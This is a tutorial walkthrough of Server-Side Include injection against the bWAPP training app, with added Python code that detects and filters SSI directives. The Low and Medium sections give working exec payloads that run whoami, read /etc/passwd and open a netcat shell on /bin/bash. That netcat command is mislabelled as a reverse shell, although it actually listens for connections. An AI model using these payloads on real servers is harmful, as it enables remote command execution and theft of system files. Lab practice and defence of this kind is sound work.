
Server-Side Include (SSI) Injection

 

bWAPP – Server-Side Include (SSI) Injection

What is SSI?

SSI is a simple server-side scripting language used on the web.

It is supported by Apache, nginx and Microsoft IIS.

 

It uses the file extensions .shtml, .stm and .shtm.

 

SSIs are used to execute some actions before the current page is loaded, or while the page is being rendered. To do so, the web server parses the SSI directives before serving the page to the user.

 

It is commonly used to save development time when building web apps with dynamic content.

 

SSI directive characters

< ! # = / . " - > and [a-zA-Z0-9]

 

Common directives

  • include – transcludes the content of one document into another. The file parameter specifies the file to be included.
  • exec – executes a program, script or shell command on the server. The cmd parameter specifies a server-side command.

 

Syntax

<!--#command parameter="value" -->

Example: <!--#exec cmd="whoami" -->
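To make the syntax above concrete from the defender's side, here is a small Python scanner, added for this write-up and not part of bWAPP or the original post, that recognises SSI directives in text (a request body, a form field, a log line) and rates them by the directive used: exec is rated high because it runs a server-side command, include medium because it pulls in a file, anything else low. The regexes and the severity table are my own assumptions; the parser also accepts the unquoted parameter form (cmd=ls) that the Medium level of this walkthrough relies on, so that form is not missed.

```python
import re
from urllib.parse import unquote_plus

# An SSI directive is "<!--#" immediately followed by the element name, then
# attribute=value pairs, then "-->".  A normal HTML comment ("<!-- note -->")
# has no '#' and therefore must not match.
DIRECTIVE_RE = re.compile(r"<!--#\s*([A-Za-z]+)\s*(.*?)\s*-->", re.DOTALL)

# Attribute parser: name="value", name='value', or (assumption mirroring the
# unquoted form used later in this walkthrough) a bare name=value token.
ATTR_RE = re.compile(r"""([A-Za-z_]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"']+))""")

# Constructed severity table: which directives matter most to a defender.
SEVERITY = {"exec": "high", "include": "medium"}


def parse_ssi_directives(text):
    """Return every SSI directive in text as a list of (command, {attr: value})."""
    found = []
    for m in DIRECTIVE_RE.finditer(text):
        command = m.group(1).lower()
        attrs = {}
        for a in ATTR_RE.finditer(m.group(2)):
            # Exactly one of the three value groups is set, depending on quoting.
            value = next(v for v in a.groups()[1:] if v is not None)
            attrs[a.group(1).lower()] = value
        found.append((command, attrs))
    return found


def scan_form_field(raw_value):
    """Scan one URL-encoded form value (as it appears in a POST body or log).

    Decodes percent-encoding and '+' first, because an attacker-supplied
    '<!--#' arrives as '%3C%21--%23' on the wire; returns a list of
    (command, severity, attrs) findings, empty when the value is clean.
    """
    decoded = unquote_plus(raw_value)
    return [
        (command, SEVERITY.get(command, "low"), attrs)
        for command, attrs in parse_ssi_directives(decoded)
    ]


if __name__ == "__main__":
    # Constructed sample: a bWAPP-style POST body for the firstname field.
    sample_body = "firstname=%3C%21--%23exec+cmd%3D%22whoami%22+--%3E&lastname=Smith"
    for field in sample_body.split("&"):
        name, _, value = field.partition("=")
        for command, severity, attrs in scan_form_field(value):
            print(f"{name}: {severity.upper()} - #{command} {attrs}")
```

Run over a web server access log or a proxy capture, the scanner flags the exact payload shape this page tests with; the decode step is the important part, because a rule that only looks for the literal string `<!--#` in the raw request line sees `%3C%21--%23` and matches nothing.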

 

What is server-side includes Injection?

A Server-Side Includes injection attack exploits a web application by injecting SSI directives into HTML pages, allowing scripts to be injected or arbitrary code to be executed remotely. It can be exploited by manipulating SSI directives already in use in the application, or by forcing their use through user input fields that are reflected into an SSI-processed page.

 

Analyzing the web application

  • Check whether the web app properly validates its input fields by testing the characters used in SSI directives:
  • < ! # = / . " - > and [a-zA-Z0-9]

 

Analyzing the POST request

  • Send test data to see the result
  • Analyze the POST request

 

Low

  • With the security level set to low, we can test a standard SSI command using all of the SSI directive characters.
  • Execute OS commands:
    • <!--#exec cmd="whoami" -->  – system info

    • <!--#exec cmd="cat /etc/passwd" -->  – passwd file

  • Reverse shell
    • 1st entry: Reverse Shell

    • <!--#exec cmd="nc -lvp 1234 -e /bin/bash" -->

 

Medium

  • Test the previous commands – at this level there is some data validation for some SSI-specific directive characters.
  • The first thing we can try is removing the quotation marks from the commands.
  • <!--#exec cmd=ls -->
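The Medium level shows why filtering one directive character is not a fix. The Python below is an added example, not bWAPP's source: weak_filter is my reconstruction of a validation that only removes double quotes (the behaviour the walkthrough describes, not the actual bWAPP code), and the two hardened alternatives are the standard defences: HTML-encode the value on output so the server's SSI parser never sees a literal <!--#, or validate the field against an allowlist of the characters a name actually needs. The regexes and the 64-character limit are assumptions.

```python
import html
import re

# "<!--#" followed by an element name is the start of an SSI directive.
SSI_MARKER = re.compile(r"<!--#\s*[A-Za-z]+")

# Allowlist for a person-name field: letters, digits, space, hyphen, apostrophe.
# None of '<', '!' or '#' is permitted, so "<!--#" cannot be formed at all.
NAME_ALLOWED = re.compile(r"^[A-Za-z0-9 '\-]{1,64}$")


def weak_filter(value):
    """Reconstruction of a quote-stripping filter: removes '"' and nothing else."""
    return value.replace('"', "")


def still_has_directive(value):
    """True when the value still contains the start of an SSI directive."""
    return SSI_MARKER.search(value) is not None


def escape_for_html(value):
    """Output encoding: '<' becomes '&lt;', so the SSI parser sees no '<!--#'."""
    return html.escape(value, quote=True)


def allowlist_name(value):
    """Input validation: accept only characters a name field legitimately needs."""
    return NAME_ALLOWED.fullmatch(value) is not None


def render_greeting(first, last):
    """Defence in depth: reject on the allowlist, encode what is accepted.

    Returns the HTML fragment to serve, or None when either field is rejected.
    """
    if not (allowlist_name(first) and allowlist_name(last)):
        return None
    return f"Hello {escape_for_html(first)} {escape_for_html(last)}"


if __name__ == "__main__":
    # Constructed inputs: the quoted payload and the unquoted Medium-level variant.
    for payload in ('<!--#exec cmd="whoami" -->', "<!--#exec cmd=ls -->"):
        after_weak = weak_filter(payload)
        print(f"weak filter   -> {after_weak!r}  directive left: {still_has_directive(after_weak)}")
        after_escape = escape_for_html(payload)
        print(f"html-encoded  -> {after_escape!r}  directive left: {still_has_directive(after_escape)}")
        print(f"allowlist     -> accepted: {allowlist_name(payload)}")
    print(render_greeting("Alice", "Smith"))
```

Stripping quotes removes a character the directive does not need, which is exactly what the unquoted cmd=ls variant demonstrates; encoding or allowlisting removes the characters it cannot do without. Independently of input handling, on Apache the server-side control is `Options IncludesNOEXEC`, which keeps include working while disabling exec, and user-supplied data should not be written into an SSI-processed page in the first place.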

Ankush Gaikwad

Software/web/App Developer and Cyber Security Investigator
